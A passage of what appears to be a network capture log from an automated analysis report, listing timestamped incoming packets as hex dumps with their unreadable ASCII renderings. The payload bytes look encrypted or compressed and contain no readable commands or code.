e0 c4 fa 80 a3 51 83 2a f2 8e 7a bd 77 a0 2c 04 a2 c2 45 5e e0 15 55 b9 Data Ascii: ut}{.;fY}:;&Sj.Sq:HmJa{\|$1$~T9V#^.'2c\t;TB9.)Hi`aHzp-qRV'L+TGPm>~4fuwR@J6M:k#6<bz!P?a\dw05Qzw,E^U
2022-08-23 11:21:50 UTC	38	IN	Data Raw: 3b 01 46 29 4e 68 5d a6 1f 6c 4d a9 67 d5 d5 3e e2 5a 83 19 60 c8 cf 7c ec 0b 41 38 56 9d 28 99 b4 3f 47 fd f6 67 1f 2f 2f ec 3e 5c 47 05 8a 5c 9e 08 79 4c 78 47 56 bd a2 ac 4d 85 9d 88 c3 c0 45 28 fe f4 c0 54 98 5c eb fc 44 89 2c f9 2b b2 69 c0 e8 f4 7b 9c db 44 02 c3 f1 e2 2f 3c 3a d4 c0 9b 7f 44 8a 5e fc ce 74 10 eb da 60 dc 85 02 59 34 cb bb 67 30 93 67 73 d5 10 cb 61 a5 68 cd 7b 2c 30 18 e4 2e 92 9f 43 b9 cf 1e 0f c2 c9 14 3b 36 c2 09 40 e3 ef 1d a0 f0 a0 20 d3 35 a4 ea 5d 8d 65 b4 27 5f cc ba be d0 06 19 34 4f fe d5 a5 e3 49 b3 34 e8 a8 b0 2c 2f d9 65 07 ec 9c 31 33 35 09 ef 7c 44 8e 0c 2a 65 b1 6f f9 35 cf 7e d4 71 71 25 aa 52 5a 4a 36 8c f2 d7 be 50 26 b3 73 31 fb 36 bc e9 03 c4 88 f5 44 1f 1f 5b 30 bc 81 5d 98 85 11 80 97 5c ba f1 46 95 fe 5e 77 Data Ascii: ;F)Nh]lMg>Z`\|A8V(?Gg//>\G\yLxGVME(T\D,+i{D/<:D^t`Y4g0gsah{,0.C;6@ 5]e'_4OI4,/e135\|D*eo5~qq%RZJ6P&s16D[0]\F^w
2022-08-23 11:21:50 UTC	40	IN	Data Raw: 62 2a 3e 90 6a 25 91 1e a3 7a 53 49 31 f2 1a f2 28 29 65 df 01 7e 30 e2 67 5f 54 61 5c f6 5d 2b 94 37 e7 a2 a4 6d fb a6 7d 82 5c 1e c8 98 8c 52 71 28 cf a1 61 31 34 8a ad 0c 61 c3 63 d5 27 ac 53 d6 31 45 c6 e5 70 61 37 fb 99 94 c9 10 75 18 ad 61 0d af 5d 18 3e bb 30 02 14 14 ae fa ad 90 de be d7 90 37 50 bf 24 06 92 9a 5a f0 b1 39 8e 23 89 9a a0 83 1e d4 46 2a 8c 03 34 c1 88 26 13 b6 35 87 d1 61 72 df 51 e6 07 61 b3 72 9c 7c 22 9a 5c aa a9 76 d9 e2 ac b7 71 35 bc 2b 71 13 e1 96 dd 3b b3 ea 97 bc 96 cc 9b 3e 11 40 f0 27 a7 3a 64 a3 76 12 29 b6 75 13 af b8 c6 6b 9b 3b e1 af f4 94 48 79 9d b7 6b dd 14 f1 b7 fd c3 fa 92 d7 a1 40 b5 e3 cd 54 5f ea c8 a9 5f d8 ae 87 25 02 bc 25 2c e5 e0 8c 7d fe 03 8f 50 ef 0d 99 3d 3e 75 89 63 04 85 99 53 7a 34 17 e7 bc a7 01 Data Ascii: b>j%zSI1()e~0g_Ta\]+7m}\Rq(a14ac'S1Epa7ua]>07P$Z9#F4&5arQar\|"\vq5+q;>@':dv)uk;Hyk@T__%%,}P=>ucSz4
2022-08-23 11:21:50 UTC	41	IN	Data Raw: 6f d3 96 3f a0 91 53 a0 d5 cf 86 e1 00 1b 38 72 9d 36 af 58 15 ef e6 22 4f ed 22 39 11 37 41 a1 31 f0 7b c9 3a 5d d7 7e a8 6c 54 5b 2a 03 06 f1 c3 36 7f b1 9e a8 ca c0 67 14 ed 8c e6 9d be ba f8 7e b3 83 18 e8 2b 51 96 6d b5 c1 b2 7b 7b 50 71 1b e1 71 26 3f b7 87 36 ad 6e bf 9b f6 ae 58 0e 3e 4f e9 80 dc 41 0a 82 3e 06 5d 8a b0 2d 85 c4 5e 8b 11 0a f0 10 ea 6c f4 50 8b ac c6 a1 71 a7 33 26 94 5d 65 a4 20 04 3f 4b 2e ce b2 fa 94 01 95 38 74 3d 99 d6 cb b5 d0 37 49 12 66 7e 13 67 74 c6 81 e1 d7 b0 c7 94 d8 6e b7 87 47 4e b3 21 c8 2d ea d2 c5 84 a0 7d 8f 20 96 26 ad ae 76 93 27 06 b1 d3 53 52 29 66 a2 b9 2b 29 d4 4a 78 c1 d3 99 78 da 3c 34 bc d2 98 a8 3e 0d e2 09 58 d6 b6 e0 fc 18 f8 19 23 f2 c5 d7 53 15 4e a5 a4 5d a3 da 27 5c a4 09 34 82 8b 7e ae f8 4e 20 Data Ascii: o?S8r6X"O"97A1{:]~lT[*6g~+Qm{{Pqq&?6nX>OA>]-^lPq3&]e ?K.8t=7If~gtnGN!-} &v'SR)f+)Jxx<4>X#SN]'\4~N
2022-08-23 11:21:50 UTC	42	IN	Data Raw: 69 45 25 66 73 fd 47 88 83 e0 5a ef 45 22 d7 47 c4 4b d2 a8 95 fc 44 89 4e ad 22 b1 07 1a f9 fe 69 1f f1 4d 15 d5 e9 fe a4 13 34 e2 e8 43 ae 48 80 c2 f6 e3 71 17 f4 8c 60 ae 84 02 59 dc d6 bc 70 fd d1 71 68 c8 9f d8 74 68 77 d5 6f b3 36 c2 f7 29 51 c6 68 9f df 32 0a ca d8 1a 02 9e 53 18 4c 8b b6 8c c1 6d c0 74 c2 3d b4 fc 4b 92 de a5 32 7e c7 2b e7 4c 17 11 54 99 ed cc a2 e0 73 a5 05 3b cc 9d 2c 03 d1 6e 05 fd 92 36 c9 5b f5 ed 6b 45 9d 00 23 92 a1 46 94 ce cd 55 3d 60 55 65 a1 43 5c 61 a4 de f2 d1 a7 35 ef b9 79 e5 62 76 b5 c5 05 ff 92 aa 1a 1f 30 51 ec 97 f1 4b 15 bb 07 8b bd 6d bc dc 51 6b ff 73 65 7d 71 89 1f 8a f3 e8 b2 9d d8 86 b7 7d 81 fb 1d 2e 0d 84 f7 c7 ce fb b0 d5 17 81 33 27 ac 88 c0 60 fe 7e 4c 18 a7 84 25 08 d1 53 5f 9a d7 45 76 17 aa a5 cd Data Ascii: iE%fsGZE"GKDN"iM4CHq`Ypqhthwo6)Qh2SLmt=K2~+LTs;,n6[kE#FU=`UeC\a5ybv0QKmQkse}q}.3'`~L%S_Ev
2022-08-23 11:21:50 UTC	44	IN	Data Raw: 70 42 f6 8d bc 00 4b 7e b4 d5 2d a4 40 a5 f2 93 d5 e9 63 1d 61 4c 88 98 11 7c 76 0f 7b e8 f8 c0 e0 18 2d b5 23 7e d0 1c bf fa b9 fa 09 30 60 bc ae 92 be 2e 13 8e 1e ab ee b3 2f e0 f1 80 ba aa 3b 00 2b 8a ee d7 ce 35 c1 88 37 77 57 3e f3 12 49 5c de 52 fd d3 70 90 01 bf 7d 23 8c 43 9a 81 22 db e2 48 3a 57 26 a1 2d 62 17 2c fb ce 30 d9 e6 86 b7 98 f5 9b 2f 06 24 86 18 a7 37 a1 76 3d 37 01 b9 9a e2 af 8b fb 02 71 3a e6 b2 19 99 75 77 f1 79 6b da 0d 0c a7 db dc f0 8e 37 a1 40 b9 89 c2 7c 0b ea c2 b6 3b fe a8 91 dd 10 95 f9 21 ff ec a7 6b 11 0e d7 6b c4 0f b3 ed 49 75 89 7a e8 ac 9e 8e 70 e9 c7 9e bc a7 18 6c 21 3f f4 4c ec d6 7b d1 b8 64 ef cc 22 f3 50 d4 f4 fd c8 cf 05 2a 1b 4b 24 a9 53 23 88 b7 45 fe d5 e7 67 1f 25 24 dd 74 10 ff 1f a9 4d 9d a8 f0 6a 1a 9c Data Ascii: pBK~-@caL\|v{-#~0`./;+57wW>I\Rp}#C"H:W&-b,0/$7v=7q:uwyk7@\|;!kkIuzpl!?L{d"P*K$S#Eg%$tMj
2022-08-23 11:21:50 UTC	45	IN	Data Raw: 93 84 db d9 19 d7 fd 89 fa 81 a7 89 1d 71 b3 98 08 c3 c6 4b ba 76 ac f6 5e 84 7a 76 74 03 e3 75 0e 45 b9 9d c2 bf 53 ac 8e f5 38 77 1f 25 51 ca 79 c6 7e 14 93 29 1e 98 97 98 a1 86 c9 4c 8c 13 08 c7 eb f8 77 fe 5e 9b a0 ee 5f 61 84 26 26 61 46 9f a4 3a 12 01 70 f3 cf a3 eb 07 67 6b 39 59 32 8d cc f1 6f de 37 52 35 34 82 12 4d 21 f0 53 63 d1 df 8c bc cc 64 a4 97 70 23 a2 3a ce 27 7c ca d2 7a a0 42 8f 20 97 2a 7c 95 6c 8c 3f 1f 08 c2 48 5e 29 5e d0 e9 07 3c fd 2d 68 cb c1 8a 6e 73 3c 2e ca 1f 14 f9 34 1e ec b4 54 cf b7 ff fd 8f b6 34 dd f2 4b cd 48 0d 54 ac 79 5a bc de 84 1d bf 09 24 8a 98 4d 5c ef 75 b2 39 af 5c 31 1a 72 73 62 44 d1 0b 77 01 e6 cf e1 69 c5 13 e0 5a 3d 70 77 cc 0e 9d fd 7b 3d 51 45 3e b3 ab 76 ed 23 a5 ae 51 0b c6 f5 c4 6b 94 d2 1e 67 7c 5f Data Ascii: qKv^zvtuES8w%Qy~)Lw^_a&&aF:pgk9Y2o7R54M!Scdp#:'\|zB *\|l?H^)^<-hns<.4T4KHTyZ$M\u9\1rsbDwiZ=pw{=QE>v#Qkg\|_
2022-08-23 11:21:50 UTC	47	IN	Data Raw: 65 7f 07 d1 48 76 8c 6d be 41 c7 b1 bb f5 c8 7f 55 c9 89 88 18 b4 61 dd 3d 03 09 51 e4 24 48 e4 43 b9 cf 2a 1b c2 cb 1e 2c 96 d8 50 4a 94 be 1d a0 f1 d3 71 dd 35 fe 90 5a 90 4f b4 34 6f d4 8a 82 d0 81 19 43 4f 77 c4 b3 f9 76 a3 47 06 be 4e 27 0f a8 97 0d ec 91 2a c4 3c 2d e9 04 87 8f 0b 38 f4 e2 43 fb 14 a2 85 37 73 53 67 ac 21 84 48 59 d4 e1 d2 a5 3a ef b5 1c ee 76 67 b6 f8 07 f6 f4 12 46 1f 3a 4a 35 a4 99 85 99 94 0d 83 bf 28 e8 f6 51 61 ec 76 64 78 1e 60 1e 26 f9 dd 67 8c d3 97 b3 6b 90 e4 a3 9d 62 ea f6 c7 c4 70 6e cf 17 80 7c c8 cb 88 ca 5a c5 e0 99 19 ad 52 f0 1c 55 50 59 93 b9 14 71 14 cf ac cb ad 6d a0 80 42 95 db 30 9b cd 0a 08 33 24 4b 3f c2 47 14 fc fd 22 5e f4 3d 2d ef 5e 1b af 39 e1 70 e1 fc 47 e7 70 bb fd 4b 40 39 91 06 e0 c9 3d 45 3c 76 85 Data Ascii: eHvmAUa=Q$HC,PJq5ZO4oCOwvGN'<-8C7sSg!HY:vgF:J5(Qavdx`&gkbpn\|ZRUPYqmB03$K?G"^=-^9pGpK@9=E<v
2022-08-23 11:21:50 UTC	48	IN	Data Raw: 09 86 ed 7b 11 4c 26 e5 dc 4f 9b a4 b1 2a 2b b9 d5 b7 1e 31 c1 f0 24 7c 46 be 87 d7 58 22 ce 50 ec d3 6c 8b 71 9f 78 35 a2 9d aa a9 70 ca e7 5f 50 67 d9 a2 20 76 3e e5 8e 21 39 f5 ec 86 b9 60 4a 9b 2f 06 63 10 19 a7 37 0e b2 76 3e 2b ca 32 27 ae b8 ca 74 ff 69 e6 b8 00 9f 6d 05 e8 bc 6b de 0a 09 38 66 db d1 39 14 a0 46 ac 93 f3 51 49 16 c1 bc 5c f4 be b9 25 01 90 21 2a eb 6c 0d 67 00 03 8b 99 c5 0f b8 f1 fb 74 89 7a 4e 8e b3 89 7a 27 27 95 bc 35 10 4c 31 d5 f4 4c bd 04 79 af d2 6d cf c6 cd e2 51 94 37 ef cd de 73 dc 32 8d 2f c6 bb 31 8c ac 2d f5 41 e6 67 15 28 26 e7 b9 47 d7 29 b2 5e 90 0e e4 72 17 2e 56 b7 76 5f 5c 82 8b b7 ff 53 44 22 dc f6 d1 53 8a 21 34 4b 6c 1b 5c a8 21 10 79 cd e0 fa c1 1d f0 34 14 d3 f8 fc b9 17 55 c5 c1 91 a5 36 e4 5e e7 e2 65 19 Data Ascii: {L&O+1$\|FX"Plqx5p_Pg v>!9`J/c7v>+2'timk8f9FQI\%!lgtzNz''5L1LymQ7s2/1-Ag(&G)^r.Vv_\SD"S!4Kl\!y4U6^e
2022-08-23 11:21:50 UTC	49	IN	Data Raw: 93 39 02 83 8c 62 b6 ae 66 4f 8e 16 1b c7 d3 f8 77 fe 49 84 9b e3 5c 70 8d 2e ba 98 47 b3 b6 38 1f 06 5c 23 d9 2f 23 8b 36 6a 9b 49 25 9c c7 cb 8e d0 37 49 32 3b 54 10 62 5c e2 95 6c d6 df 8d 95 cc 70 b0 b5 c0 76 a0 30 dc 14 15 cf d2 7c b8 dc 82 31 9d 3d 68 b9 6c 88 29 17 08 c2 46 5e 20 f6 0d b8 07 3d 5e 9e 7d d9 db 15 de 5d 7c 24 d3 08 3a b9 30 0d e8 07 40 d1 b9 f9 60 51 e7 34 dc e0 ef cd 44 08 48 21 63 48 bf d3 95 5e b9 11 33 05 85 5a 78 61 62 2e 22 b2 4d 31 16 4f 5e 6b 56 5b 80 53 09 f0 53 fa b5 d3 05 7c 50 19 73 5f 50 04 b5 57 5d 21 48 3e 32 a2 a4 72 07 d6 a4 82 28 16 ca e3 4f 59 59 7d e1 98 69 4d 88 42 ac 08 69 b2 6b c5 02 80 7c ad e8 4f cb f5 78 32 c1 fb 99 9a 15 6b aa 32 ad 65 d7 81 fc 19 3e b1 32 79 c1 14 ae fe af c8 0c be d7 b7 59 92 be 34 0c be Data Ascii: 9bfOwI\p.G8\#/#6jI%7I2;Tb\lpv0\|1=hl)F^ =^}]\|$:0@`Q4DH!cH^3Zxab."M1O^kV[SS\|Ps_PW]!H>2r(OYY}iMBik\|Ox2k2e>2yY4
2022-08-23 11:21:50 UTC	51	IN	Data Raw: d9 22 7f 96 ae 9b 4f be 3c 00 ef bb 86 d6 19 5b 50 44 fe d5 b8 f7 26 56 35 c3 b3 47 3c 0a e5 90 0e ec 9b 38 88 27 2e ed 7a 44 91 1b cc 9a 9c 52 fc 71 d0 54 37 75 48 71 c5 a7 51 49 53 c1 e3 c4 bf 3f ef b8 6c 2f 89 66 90 e0 3a 31 67 3a b8 00 25 48 3b bc e7 56 87 be f9 8a 90 4b ab f1 4b 04 e5 73 75 7b 6e a0 0c 2d f3 df 6b 82 e5 78 b6 51 8a e3 24 3d db a1 e4 c3 d1 49 a3 de 06 94 18 3a 34 89 ec 43 ad 62 83 18 a7 88 38 56 b3 81 a0 65 c9 40 62 1f c5 61 c7 9a 13 5e 81 64 b4 a8 10 86 cd 0c 19 3b 77 73 36 af 47 0b f7 e2 1e a0 f7 11 36 e6 2e bb ac 3a f6 a6 70 2a 5f 59 c3 85 d3 4b 40 39 07 3b f3 d3 29 5f 44 83 7a da ee 7e 1c f5 18 e3 86 a5 81 05 7e a2 82 18 f1 c6 4b ba 6c bf d9 b8 8c 6d aa ee 76 ec 7b 0e 52 a9 ab 2f b5 7f b1 9a fa ae a6 1e 09 5b aa 5f dc 6d 1d 80 3e Data Ascii: "O<[PD&V5G<8'.zDRqT7uHqQIS?l/f:1g:%H;VKKsu{n-kxQ$=I:4Cb8Ve@ba^d;ws6G6.:p*_YK@9;)_Dz~~Klmv{R/[_m>
2022-08-23 11:21:50 UTC	52	IN	Data Raw: 3d 62 18 d9 86 ce 30 e4 e0 06 af e8 ca b3 2a 04 4b dd 09 a3 b1 52 5d 77 3f 4e 47 1b e2 a5 9e d1 7b 87 ed f5 b2 1b 9f 75 70 0b 0b 59 02 04 27 b1 d2 cd ff fb 7b c3 40 bf 9c ca 77 5f e8 c8 df 36 d8 a9 9b fd 05 86 21 54 16 e1 8b 6d 6f fb a2 52 ce 29 99 dd 05 72 95 43 6e 85 e2 8c 7b 34 13 8f b1 b1 03 40 1a 79 e5 41 bd 0a eb c2 bd 6b e7 c7 a1 f3 56 85 34 70 e7 cf 76 cb 75 bc 2f c6 bb 04 99 b1 3e 0b c6 eb 76 13 34 29 73 83 79 0f 21 81 45 94 1f e5 62 06 24 56 b7 78 d5 6e 85 9c aa b8 a2 45 22 dc 72 c6 42 94 4a 42 fd 44 82 32 51 2a b2 62 ec fb 85 67 0d f7 5f 69 28 f9 fa bf 07 25 ff d7 83 a1 60 71 5f e7 ec 73 16 e3 c1 4e 13 90 02 53 4a a8 69 67 2b c8 50 6b c1 a8 1b 44 b4 6b fa 01 da 2f 0a ea da 54 db 43 b9 d5 59 46 c2 c9 14 cf 94 b9 0b 4b 9a ba 91 9a f1 d1 73 cc 05 Data Ascii: =b0KR]w?NG{upY'{@w_6!TmoR)rCn{4@yAkV4pvu/>v4)sy!Eb$VxnE"rBJBD2Qbg_i(%`q_sNSJig+PkDk/TCYFKs
2022-08-23 11:21:50 UTC	53	IN	Data Raw: 3c 3e 7a 05 68 74 f5 83 e1 db 7d 9c 92 cb 63 b5 9a 4c 62 b7 b7 9a 3c f1 cc c1 72 b0 59 93 26 01 2d 73 95 e5 8c 3f 1f bb db 54 d9 1a 70 4d bf 11 a6 d4 9e 79 c1 d3 96 41 c0 2d 24 d9 05 84 bb 39 1e fc 1b 5a d7 53 e1 c1 21 f6 32 cb 69 c1 cd 42 1e 55 6d 7e 4e a8 de 21 5b bf 09 2f b1 34 5c 50 f3 16 22 28 a3 50 2d 99 70 6c 77 53 5c 17 64 15 0e 52 dc 6f ce 00 6b 9d 22 62 40 5e 1d 90 f7 4c 2c 5d 46 c0 a3 88 5e ff cc a1 84 4d 1f 5b 6f 7b 52 71 2d e9 8f ee 4d e7 8a ac 1b 64 a9 b2 c3 36 ad dd fc e8 45 c7 43 63 1d fb d3 d8 91 cb 61 84 e7 ac 65 dd e8 e0 1b 3e bb ae 66 cc 07 a3 fe be e6 12 a9 29 95 74 98 af 20 1b 68 80 80 f1 ab 3d fe f4 98 97 ba 45 01 07 b0 ed 97 2c 34 c1 9d 2d 6f 4b 35 96 da 56 49 21 50 c0 d3 70 91 6a 0c 50 f5 95 4a b9 a4 76 c8 ef 51 5e 8f 26 8d 22 49 Data Ascii: <>zht}cLb<rY&-s?TpMyA-$9ZS!2iBUm~N![/4\P"(P-plwS\dRok"b@^L,]F^M[o{Rq-Md6ECcae>f)t h=E,4-oK5VI!PpjPJvQ^&"I
2022-08-23 11:21:50 UTC	57	IN	Data Raw: 15 94 19 ad 61 ff f2 e2 19 38 b2 35 51 8f 14 ae f4 87 d2 0d be dd b9 62 89 33 3c 0c be 92 97 ea a2 2a e5 8a b1 9b a4 bf a2 3a bd c2 8c 1c 36 c1 84 86 6d 42 2d 84 75 58 58 c6 79 de db 61 9f d0 8d 78 39 8c fe bb ad 5e 94 e2 4e 5f 59 1d a1 2b 7b 34 ef 2b c7 3b f5 eb 84 b8 fd c8 8d 51 3f 4a db 1c 05 2c 79 4a 5f 0c 23 b0 1c 40 be bc d8 72 32 2a e2 a1 22 a7 66 7b 83 1e 7a de 16 09 14 c0 c9 e2 d5 26 a2 40 b9 34 f3 50 43 ea ea d7 55 d8 a3 33 ca 07 b8 6a 3b ee ea 87 6f 28 39 a3 52 ce 22 b5 80 1c 5d 9b 72 34 8d 47 87 5f 1c 3a 9c bc ad 1d 64 1f 59 f4 46 72 06 50 d1 b8 2c d3 c2 a2 f3 50 94 31 fc c8 cf 76 c9 1b 4b 2e c5 b0 22 88 b3 29 dd d5 fa 67 1f 24 3f cd 30 4b 49 29 a9 4d 34 1f e3 75 1a 10 56 b7 78 f7 65 e5 9f a0 d1 b3 56 20 d6 5e c2 7c f3 26 ba fa 6c ab 5d a8 21 Data Ascii: a85Qb3<:6mB-uXXyax9^N_Y+{4+;Q?J,yJ_#@r2"f{z&@4PCU3j;o(9R"]r4G_:dYFrP,P1vK.")g$?0KI)M4uVxeV ^\|&l]!
2022-08-23 11:21:50 UTC	61	IN	Data Raw: b1 bc a7 1a 5f 15 71 da 4c ac 0c a4 d1 a9 69 e7 a0 a3 f3 56 e0 2a fc c8 d4 19 eb 18 4b 24 18 be 07 a0 90 29 dd df f4 42 37 0b 24 fd 3e 95 d7 38 ad 65 e1 1e e3 62 06 66 54 b7 78 23 42 a0 b4 8d d7 c0 4f 31 f0 7c ee 54 92 2f 64 fc 55 8c 75 f0 2a b2 6e a5 d8 fc 63 06 29 54 23 fa d5 fa b5 1e 38 f3 e8 bf af 48 80 80 e7 f7 64 38 bd d1 48 7a ea 23 51 40 cd 65 68 0e ea 5b 79 cf 8a f4 6d 9c 4f d7 e1 0e ff 18 f5 20 6a ab 42 b9 c8 59 3a c0 c9 14 cd 99 e7 21 67 9a be 17 b3 d8 f9 5f d3 35 af 27 5a 8b 4b 9c 48 6e cf bc e9 f1 04 19 49 91 f1 e1 9b c5 62 a8 3e fc 95 66 03 03 db 77 d2 ec 8a 23 e5 52 24 ed 6d 20 af 09 32 91 6e 4c de 36 e0 55 37 79 4a 5f 82 7c 50 49 53 00 f2 c6 b0 17 6e b2 73 3d 18 46 be e9 08 30 97 ed 6a 1f 30 51 18 92 f6 5d 92 4a 07 9a b8 6f d4 f7 51 6d 90 Data Ascii: _qLiVK$)B7$>8ebfTx#BO1\|T/dUunc)T#8Hd8Hz#Q@eh[ymO jBY:!g_5'ZKHnIb>fw#R$m 2nL6U7yJ_\|PISns=F0j0Q]JoQm
2022-08-23 11:21:50 UTC	65	IN	Data Raw: aa 7c e1 ed 05 ca 31 e5 f1 e8 dc 42 0f 5b 95 65 4c a8 cf 66 56 bd 09 2f f6 8c 5e 50 f3 4a 7e 29 a3 4d 34 83 1d 4d 7a 53 47 09 7d 0e e1 54 9f b7 de 05 7a 5c eb 74 4f 43 07 a5 30 5d 21 42 5b 39 b3 ad 41 9d de a4 84 33 ce cb e3 52 41 7b 3d e6 89 6a 62 82 89 ad 0e 0c 6c b4 d5 21 bb 5a bc ee 51 38 e0 63 1c 91 c9 99 90 c1 7d 84 28 ad 65 dd d6 1e 18 5e 9d 17 68 c4 38 8f d6 99 ea 0d b4 c6 93 49 9b 96 42 0f be 95 eb 3a b2 2e f5 9b db 9a a4 b1 11 2e 91 84 a5 2e 32 d2 84 35 76 6e d4 87 d7 43 71 9c 40 e7 f1 80 99 72 96 51 19 9b 5a 86 9f 05 e2 e3 4e 53 62 2b b0 27 60 18 9d e7 de 3b f3 fb 9b ad e7 a3 a6 2e 07 4d ca 14 b6 3b 12 62 76 3e 27 a1 16 ca 35 bb c0 77 ff 78 e7 b8 0c 93 75 77 ea 7b 6a da 06 27 4c d0 cd ff ee 12 7e 4f 9a be cf 54 5f e2 d1 bd 7c f6 a9 91 d1 dd 90 Data Ascii: \|1B[eLfV/^PJ~)M4MzSG}Tz\tOC0]!B[9A3RA{=jbl!ZQ8c}(e^h8IB:...25vnCq@rQZNSb+'`;.M;bv>'5wxuw{j'L~OT_\|
2022-08-23 11:21:50 UTC	69	IN	Data Raw: 4e c5 96 77 d9 e4 5f 41 59 90 a2 2b 77 7d b1 a7 df 3d f3 fb 83 d3 2b cd 9b 25 d9 44 fe 30 8a 3d 7d 57 64 2b 09 9e 1a e2 a5 66 c0 60 80 2c 30 ab 1a 84 74 6a 92 82 00 25 f3 f0 b0 fb c4 d3 fd 15 94 40 bf 96 e2 25 5f e2 b9 b0 40 c5 a9 91 da 03 90 95 3b 99 c9 8a 68 1d 02 a3 53 c4 0f 6f 83 1e 92 88 64 29 87 99 88 7a 34 09 9e cb 32 12 43 2c 59 f4 4d b7 36 7f d1 9a 6e cf c2 14 f3 50 85 42 e9 ca cf 7c d9 1e 54 34 ee 65 22 88 b7 01 66 d6 e7 61 37 06 24 fd 3e 40 d0 01 90 4d 97 15 f5 9a 68 40 7e 0b 71 fd 4b ad bf a0 d7 ca 6d 19 d6 54 ca 42 6c 24 da d0 47 99 59 82 2c 9a d4 c9 f9 f8 4b 2f f7 5b 0c fa b7 fa b5 1e 27 fc 7d 92 af 4e 87 76 59 e5 60 16 98 c3 4a 7c 8f 0a 3c 7a c5 bb 6d 44 2e 76 79 c5 97 88 51 b6 61 dd 8e ea 21 18 ee 37 4b e6 fc ba ce 30 68 d1 cb 1e 19 9e ad Data Ascii: Nw_AY+w}=+%D0=}Wd+f`,0tj%@%_@;hSod)z42C,YM6nPB\|T4e"fa7$>@Mh@~qKmTBl$GY,K/['}NvY`J\|<zmD.vyQa!7K0h
2022-08-23 11:21:50 UTC	73	IN	Data Raw: d6 54 f2 55 92 25 f0 fd 44 88 57 a8 2b b2 68 ca f9 fe 63 0c f7 5b 00 d2 f8 fa e7 15 2b d4 98 90 af 48 84 5e e7 e6 7d 10 eb d1 53 4c 83 02 b8 41 c7 bb da 2b c2 67 51 38 83 e7 43 b9 49 2f e2 04 27 0b e1 0c bb cd 43 bf dd 30 33 38 ca 1e 15 85 c6 7a 5f 98 be 17 aa d9 49 70 d3 33 ae fe 35 22 4e b4 3e 79 ff b8 80 fa 01 76 f0 4e fe ce a0 e6 5a 24 35 ef bf 5c 23 2b 6f 7c 0c e6 88 20 dc 33 0d ae 69 4f 84 18 38 8a ba 6e fc 18 c1 88 ba 72 59 74 b8 58 46 61 51 de f2 fc c7 04 ff b3 75 28 7f 4f 46 e8 02 e8 88 cc 56 15 23 4b 26 af f9 65 a9 95 07 8b ad 57 ab f9 cb 78 f4 63 7e 55 04 89 1f 20 9c d8 62 9d de aa 99 0e ba e1 2d 2c 1e 38 e6 cc e6 0e b2 d5 00 ad e9 25 ca 8e af 19 aa 0d 92 31 d1 8c 2e 10 74 86 5e 9a d0 26 3b 14 c5 7a df 8c 1c 48 80 48 bf ca 3a 8e e5 ad 0a 33 62 Data Ascii: TU%DW+hc[+H^}SLA+gQ8CI/'C038z_Ip35"N>yvNZ$5\#+o\| 3iO8nrYtXFaQu(OFV#K&eWxc~U b-,8%1.t^&;zHH:3b
2022-08-23 11:21:50 UTC	78	IN	Data Raw: bc 5d 98 9e 68 ca bd 47 bc ce 42 6a ff 72 64 7b 59 a8 1b 26 f5 d8 48 ad d4 86 bd 6b b2 de 2a 3b 09 5f b7 c5 ce 71 a1 d3 69 48 12 24 c0 b1 2f 53 aa 0d 89 1c a0 9f 2a 79 1c 7e 5f 90 c7 4f 1e d9 c4 70 c6 ad 0f a2 80 4e 97 21 30 87 cb 65 40 33 68 41 4a 99 46 1a fa c5 e7 5e f6 3d 32 e9 1e 49 ab 33 e7 66 c9 cc 5c d7 7e ad 3c f9 40 39 18 01 f1 dc 46 0e 4d 9f 8e ca c4 19 d2 fd 89 fa a4 42 93 0e 78 a5 a1 37 da 38 40 80 47 3c de bb 85 7d 6d 7b 76 b0 78 0e 5e a7 81 53 73 7e a0 9b cd 9e 5a 1f 23 78 23 7f dd 6b 74 d9 38 11 8d b5 cf a1 aa c2 4d 8d 13 08 fb 37 d1 47 f4 41 9a a5 cf 61 61 8c 2a 3b 89 54 b8 a6 27 74 10 59 35 c4 b0 ec a0 12 7a 35 49 2a e7 22 e2 7c db 24 4b 2b 27 6a 3d 50 54 f5 8b c9 86 dd 8d 9e f0 47 a4 9d 52 7a b1 31 df ea e2 c6 c3 71 b0 5c b7 e7 b6 29 7c Data Ascii: ]hGBjrd{Y&Hk;_qiH$/Sy~_OpN!0e@3hAJF^=2I3f\~<@9FMBx78@G<}m{vx^Ss~Z#x#kt8M7GAaa;T'tY5z5I"\|$K+'j=PTGRz1q\)\|
2022-08-23 11:21:50 UTC	82	IN	Data Raw: 6c 7e a6 d5 5b a6 05 1e ea 4e a4 77 f4 4b 4c a2 f3 48 a6 98 2b 26 8d 56 a0 39 9c 24 53 a5 ca 31 b2 f1 9c e0 78 29 49 31 99 c2 6d cb ee 20 be c5 d0 a2 06 44 74 c9 83 e1 db cc 82 e7 cd 66 a4 97 53 5e 8e 3a c8 36 2f cf d4 50 a6 7b c4 4d 9d 3c 7b bd 7d 8c 87 14 aa d3 39 49 36 7a 6f ba 07 3c c3 8f 79 c1 c4 9b 69 d0 2d 24 d3 09 18 aa 34 1e f7 16 45 c5 37 e2 ed 03 da 34 dd f3 f4 dc 42 1f 5f bd 72 4e 34 c5 09 4f c4 0b 25 99 83 5f 50 f9 6e 2e 28 a3 56 27 86 62 7d 7a 53 4d 8f 7b 18 f0 dd f2 65 df 26 7f 4b 31 6b 5f 50 0e 9d f7 5d 21 42 4a 3e a2 a2 69 f9 dd e9 81 5c 1a 99 e0 54 52 64 2c e1 98 7e 4a e7 8b b6 38 6b b8 5b d1 27 a8 9f ad e8 54 ee b8 76 1a e9 d3 c3 94 cb 6d 84 68 af 65 dd b3 f5 1b 3e bb 38 07 85 14 ae f4 87 b0 09 be d1 fb 6d 90 be 2e 00 b6 aa 2c ea b3 2e Data Ascii: l~[NwKLH+&V9$S1x)I1m DtfS^:6/P{M<{}9I6zo<yi-$4E74B_rN4O%_Pn.(V'b}zSM{e&K1k_P]!BJ>i\TRd,~J8k['Tvmhe>8m.,.
